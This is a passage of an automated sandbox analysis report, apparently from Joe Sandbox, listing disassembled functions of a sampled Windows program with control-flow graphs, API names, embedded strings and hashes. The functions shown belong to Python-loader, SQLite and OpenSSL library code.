                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                              • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                              • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                              • Instruction ID: d60e2cf233a9c2584f606a4fd9246dd198f0468a1ff550510e47011322249933
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3214F63F1C64251FB219B2CE8153B62350BF99358F804136E75EC65F6EE2CE604C744
                                                                                                                                                                                                                                              Function 00007FF6B751BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1461 7ff6b751ba5c-7ff6b751ba82 1462 7ff6b751ba9d-7ff6b751baa1 1461->1462 1463 7ff6b751ba84-7ff6b751ba98 call 7ff6b7514ee8 call 7ff6b7514f08 1461->1463 1465 7ff6b751be77-7ff6b751be83 call 7ff6b7514ee8 call 7ff6b7514f08 1462->1465 1466 7ff6b751baa7-7ff6b751baae 1462->1466 1477 7ff6b751be8e 1463->1477 1484 7ff6b751be89 call 7ff6b751a8e0 1465->1484 1466->1465 1468 7ff6b751bab4-7ff6b751bae2 1466->1468 1468->1465 1471 7ff6b751bae8-7ff6b751baef 1468->1471 1474 7ff6b751bb08-7ff6b751bb0b 1471->1474 1475 7ff6b751baf1-7ff6b751bb03 call 7ff6b7514ee8 call 7ff6b7514f08 1471->1475 1480 7ff6b751bb11-7ff6b751bb17 1474->1480 1481 7ff6b751be73-7ff6b751be75 1474->1481 1475->1484 1482 7ff6b751be91-7ff6b751bea8 1477->1482 1480->1481 1485 7ff6b751bb1d-7ff6b751bb20 1480->1485 1481->1482 1484->1477 1485->1475 1486 7ff6b751bb22-7ff6b751bb47 1485->1486 1489 7ff6b751bb49-7ff6b751bb4b 1486->1489 1490 7ff6b751bb7a-7ff6b751bb81 1486->1490 1492 7ff6b751bb4d-7ff6b751bb54 1489->1492 1493 7ff6b751bb72-7ff6b751bb78 1489->1493 1494 7ff6b751bb56-7ff6b751bb6d call 7ff6b7514ee8 call 7ff6b7514f08 call 7ff6b751a8e0 1490->1494 1495 7ff6b751bb83-7ff6b751bb8f call 7ff6b751d5fc 1490->1495 1492->1493 1492->1494 1497 7ff6b751bbf8-7ff6b751bc0f 1493->1497 1526 7ff6b751bd00 1494->1526 1502 7ff6b751bb94-7ff6b751bbab call 7ff6b751a948 * 2 1495->1502 1500 7ff6b751bc8a-7ff6b751bc94 call 7ff6b752391c 1497->1500 1501 7ff6b751bc11-7ff6b751bc19 1497->1501 1513 7ff6b751bc9a-7ff6b751bcaf 1500->1513 1514 7ff6b751bd1e 1500->1514 1501->1500 1505 7ff6b751bc1b-7ff6b751bc1d 1501->1505 1522 7ff6b751bbc8-7ff6b751bbf3 call 7ff6b751c284 1502->1522 1523 7ff6b751bbad-7ff6b751bbc3 call 7ff6b7514f08 call 7ff6b7514ee8 1502->1523 1505->1500 1510 7ff6b751bc1f-7ff6b751bc35 1505->1510 1510->1500 1515 7ff6b751bc37-7ff6b751bc43 1510->1515 1513->1514 1520 7ff6b751bcb1-7ff6b751bcc3 GetConsoleMode 1513->1520 1518 7ff6b751bd23-7ff6b751bd43 ReadFile 1514->1518 1515->1500 1516 7ff6b751bc45-7ff6b751bc47 1515->1516 1516->1500 1521 7ff6b751bc49-7ff6b751bc61 1516->1521 1524 7ff6b751bd49-7ff6b751bd51 1518->1524 1525 7ff6b751be3d-7ff6b751be46 GetLastError 1518->1525 1520->1514 1527 7ff6b751bcc5-7ff6b751bccd 1520->1527 1521->1500 1529 7ff6b751bc63-7ff6b751bc6f 1521->1529 1522->1497 1523->1526 1524->1525 1531 7ff6b751bd57 1524->1531 1534 7ff6b751be48-7ff6b751be5e call 7ff6b7514f08 call 7ff6b7514ee8 1525->1534 1535 7ff6b751be63-7ff6b751be66 1525->1535 1528 7ff6b751bd03-7ff6b751bd0d call 7ff6b751a948 1526->1528 1527->1518 1533 7ff6b751bccf-7ff6b751bcf1 ReadConsoleW 1527->1533 1528->1482 1529->1500 1537 7ff6b751bc71-7ff6b751bc73 1529->1537 1541 7ff6b751bd5e-7ff6b751bd73 1531->1541 1543 7ff6b751bcf3 GetLastError 1533->1543 1544 7ff6b751bd12-7ff6b751bd1c 1533->1544 1534->1526 1538 7ff6b751bcf9-7ff6b751bcfb call 7ff6b7514e7c 1535->1538 1539 7ff6b751be6c-7ff6b751be6e 1535->1539 1537->1500 1548 7ff6b751bc75-7ff6b751bc85 1537->1548 1538->1526 1539->1528 1541->1528 1550 7ff6b751bd75-7ff6b751bd80 1541->1550 1543->1538 1544->1541 1548->1500 1554 7ff6b751bda7-7ff6b751bdaf 1550->1554 1555 7ff6b751bd82-7ff6b751bd9b call 7ff6b751b674 1550->1555 1558 7ff6b751be2b-7ff6b751be38 call 7ff6b751b4b4 1554->1558 1559 7ff6b751bdb1-7ff6b751bdc3 1554->1559 1561 7ff6b751bda0-7ff6b751bda2 1555->1561 1558->1561 1562 7ff6b751be1e-7ff6b751be26 1559->1562 1563 7ff6b751bdc5 1559->1563 1561->1528 1562->1528 1564 7ff6b751bdca-7ff6b751bdd1 1563->1564 1566 7ff6b751be0d-7ff6b751be18 1564->1566 1567 7ff6b751bdd3-7ff6b751bdd7 1564->1567 1566->1562 1568 7ff6b751bdd9-7ff6b751bde0 1567->1568 1569 7ff6b751bdf3 1567->1569 1568->1569 1570 7ff6b751bde2-7ff6b751bde6 1568->1570 1571 7ff6b751bdf9-7ff6b751be09 1569->1571 1570->1569 1572 7ff6b751bde8-7ff6b751bdf1 1570->1572 1571->1564 1573 7ff6b751be0b 1571->1573 1572->1571 1573->1562
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                                              • Instruction ID: 43c8f9c447001a8a1015abfabceffc146aa3ecb77f293aab244723419772810e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3C1C123A0C6A792E6619F1D94402BD3BA0FB81F91F554235EB8E83BB1CE7CE8458700
                                                                                                                                                                                                                                              Function 00007FF6B7506360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                              • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                              • Instruction ID: 81718045b4f0cc2df8531e2afdf1908686f62bc0f3d0074c7a022fbbb2a69b9f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10417F23A1CA8791EB25DB28E4542E96321FF44398F800132EB5D876F6EF3CE609C740
                                                                                                                                                                                                                                              Function 00007FFE0130FFD0 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 409fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1754 7ffe0130ffd0-7ffe0131001c 1755 7ffe01310021-7ffe01310094 1754->1755 1756 7ffe01310096-7ffe013100a5 call 7ffe0130fa10 1755->1756 1757 7ffe013100bb-7ffe013100cb call 7ffe0130d020 1755->1757 1762 7ffe01310637-7ffe0131065a call 7ffe01432900 1756->1762 1763 7ffe013100ab-7ffe013100b6 1756->1763 1764 7ffe013100d1-7ffe013100fa 1757->1764 1765 7ffe013105d2-7ffe013105d5 1757->1765 1763->1757 1766 7ffe01310100-7ffe01310115 1764->1766 1768 7ffe01310632 1765->1768 1769 7ffe013105d7-7ffe013105de 1765->1769 1776 7ffe01310152-7ffe0131015c 1766->1776 1777 7ffe01310117-7ffe01310123 1766->1777 1768->1762 1771 7ffe013105e0-7ffe013105ea 1769->1771 1772 7ffe01310629 1769->1772 1773 7ffe013105f2-7ffe0131061f 1771->1773 1774 7ffe013105ec 1771->1774 1772->1768 1773->1768 1793 7ffe01310621-7ffe01310627 1773->1793 1774->1773 1779 7ffe0131015e-7ffe01310160 1776->1779 1780 7ffe01310166-7ffe01310181 1776->1780 1777->1780 1785 7ffe01310125-7ffe0131012b 1777->1785 1779->1780 1784 7ffe013103a8-7ffe013103af 1779->1784 1782 7ffe01310183-7ffe01310188 1780->1782 1783 7ffe0131018a-7ffe01310193 1780->1783 1789 7ffe01310196-7ffe013101aa call 7ffe013c6ad0 1782->1789 1783->1789 1787 7ffe013103b1-7ffe013103bb 1784->1787 1788 7ffe013103fa 1784->1788 1791 7ffe01310133-7ffe01310136 1785->1791 1792 7ffe0131012d-7ffe01310131 1785->1792 1794 7ffe013103c3-7ffe013103f0 1787->1794 1795 7ffe013103bd 1787->1795 1798 7ffe01310403 1788->1798 1800 7ffe013101c8 1789->1800 1801 7ffe013101ac-7ffe013101c6 call 7ffe0137df90 1789->1801 1797 7ffe0131013f-7ffe01310150 1791->1797 1799 7ffe01310138-7ffe0131013d 1791->1799 1792->1791 1792->1797 1793->1768 1802 7ffe0131040a-7ffe0131040d 1794->1802 1815 7ffe013103f2-7ffe013103f8 1794->1815 1795->1794 1797->1766 1798->1802 1799->1780 1799->1797 1806 7ffe013101ca-7ffe013101ec 1800->1806 1801->1806 1808 7ffe0131040f-7ffe01310416 1802->1808 1809 7ffe0131046b-7ffe01310470 1802->1809 1812 7ffe013101f0-7ffe01310217 CreateFileW 1806->1812 1813 7ffe01310462 1808->1813 1814 7ffe01310418-7ffe0131041b 1808->1814 1809->1762 1816 7ffe013102c0 1812->1816 1817 7ffe0131021d-7ffe0131021f 1812->1817 1813->1809 1818 7ffe01310423-7ffe01310450 1814->1818 1819 7ffe0131041d 1814->1819 1815->1798 1820 7ffe013102c4-7ffe013102c7 1816->1820 1821 7ffe0131026f-7ffe0131027c 1817->1821 1822 7ffe01310221-7ffe01310233 1817->1822 1818->1809 1841 7ffe01310452-7ffe0131045d 1818->1841 1819->1818 1823 7ffe013102f7-7ffe013102fb 1820->1823 1824 7ffe013102c9-7ffe013102f2 call 7ffe01309340 1820->1824 1836 7ffe0131027e-7ffe01310284 1821->1836 1837 7ffe013102bc-7ffe013102be 1821->1837 1826 7ffe01310235 1822->1826 1827 7ffe01310237-7ffe0131025d call 7ffe01310800 1822->1827 1830 7ffe013104af-7ffe013104bd 1823->1830 1831 7ffe01310301-7ffe01310311 call 7ffe01306320 1823->1831 1824->1823 1826->1827 1846 7ffe0131025f 1827->1846 1847 7ffe01310261-7ffe01310263 1827->1847 1838 7ffe013104bf-7ffe013104cb 1830->1838 1839 7ffe013104cd-7ffe013104e6 call 7ffe01306320 1830->1839 1851 7ffe0131036e-7ffe01310373 1831->1851 1852 7ffe01310313-7ffe0131031a 1831->1852 1843 7ffe01310296-7ffe01310299 1836->1843 1844 7ffe01310286-7ffe01310294 1836->1844 1837->1820 1838->1839 1855 7ffe01310543-7ffe01310546 1839->1855 1856 7ffe013104e8-7ffe013104ef 1839->1856 1841->1762 1853 7ffe013102a2-7ffe013102b7 1843->1853 1854 7ffe0131029b-7ffe013102a0 1843->1854 1844->1843 1844->1853 1846->1847 1849 7ffe01310265-7ffe01310269 1847->1849 1850 7ffe0131026b 1847->1850 1849->1816 1849->1850 1850->1821 1858 7ffe01310475-7ffe013104aa call 7ffe0130d810 call 7ffe013c5ae0 1851->1858 1859 7ffe01310379-7ffe0131037e 1851->1859 1860 7ffe01310365 1852->1860 1861 7ffe0131031c-7ffe01310326 1852->1861 1853->1812 1854->1837 1854->1853 1862 7ffe01310548-7ffe0131054b 1855->1862 1863 7ffe0131054d 1855->1863 1864 7ffe013104f1-7ffe013104fb 1856->1864 1865 7ffe0131053a 1856->1865 1858->1762 1859->1858 1866 7ffe01310384-7ffe013103a3 1859->1866 1860->1851 1867 7ffe0131032e-7ffe0131035b 1861->1867 1868 7ffe01310328 1861->1868 1871 7ffe01310554-7ffe0131056c 1862->1871 1863->1871 1872 7ffe01310503-7ffe01310530 1864->1872 1873 7ffe013104fd 1864->1873 1865->1855 1866->1755 1867->1851 1885 7ffe0131035d-7ffe01310363 1867->1885 1868->1867 1875 7ffe0131056e 1871->1875 1876 7ffe01310572-7ffe0131057a 1871->1876 1872->1855 1890 7ffe01310532-7ffe01310538 1872->1890 1873->1872 1875->1876 1879 7ffe013105aa-7ffe013105d0 1876->1879 1880 7ffe0131057c-7ffe01310590 call 7ffe013c6ad0 1876->1880 1879->1762 1888 7ffe01310592-7ffe013105a4 call 7ffe0137df90 1880->1888 1889 7ffe013105a6 1880->1889 1885->1851 1888->1879 1888->1889 1889->1879 1890->1855
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                              • API String ID: 823142352-3829269058
                                                                                                                                                                                                                                              • Opcode ID: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
                                                                                                                                                                                                                                              • Instruction ID: b39c23d2f04684aeedbbcf3b8216fa34675faa9dcf65057b55973653eaaa5bc7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13027A21A0DA83C6FB688F65A85467973B0FF84B98F054235EE4E4A6B5DF3CE485C701
                                                                                                                                                                                                                                              Function 00007FFE0130D9E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010$FileRead
                                                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                              • API String ID: 2600561947-1843600136
                                                                                                                                                                                                                                              • Opcode ID: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
                                                                                                                                                                                                                                              • Instruction ID: 246d659aaaac3c0270fc440e5f12285b073fb8f787a0c5e011c6732e1d2d8a08
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30412222A0CA8782E7218FD5E8405B9B7E5FF94784F42403AEA4D4B6B4DF3CE4868740
                                                                                                                                                                                                                                              Function 00007FF6B7515628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                                              • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                              • Instruction ID: 0bb9fd529e0937b88cd4e6ffa7f4e000f86cc17932332b5b5c4e2bc2f5ff710c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27418023E1C79283E7509F6495503696260FB947A5F109335EBAC83EE2EF7CA5E08740
                                                                                                                                                                                                                                              Function 00007FFE007614F1 Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 231COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_read_n
                                                                                                                                                                                                                                              • API String ID: 1452528299-4226281315
                                                                                                                                                                                                                                              • Opcode ID: 72c0e7aa6cb440006a06cd762c0773f9cb24828254b5c2bc54d82e6e819b576e
                                                                                                                                                                                                                                              • Instruction ID: 19c92ac0c6445d6dad898d4b82b12de7dd03a55d7250fce7a73e5009a107a884
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72c0e7aa6cb440006a06cd762c0773f9cb24828254b5c2bc54d82e6e819b576e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9A17B61B0EA8681FB58BB25D8147B92294AF85B94F5C4132EF4D0BBADDF3CD845C310
                                                                                                                                                                                                                                              Function 00007FFE007614BF Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 229COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\statem.c$state_machine
                                                                                                                                                                                                                                              • API String ID: 1452528299-1722249466
                                                                                                                                                                                                                                              • Opcode ID: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
                                                                                                                                                                                                                                              • Instruction ID: f76e6f8e5446e7c8126656ef66b40b4505566e243c94897083714a2b70a0fa8f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46A12D26A0E64385FB64BA25D8413BD22A5EF41F44F5C4436DB4D467FECE3CE8828752
                                                                                                                                                                                                                                              Function 00007FFE0076127B Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
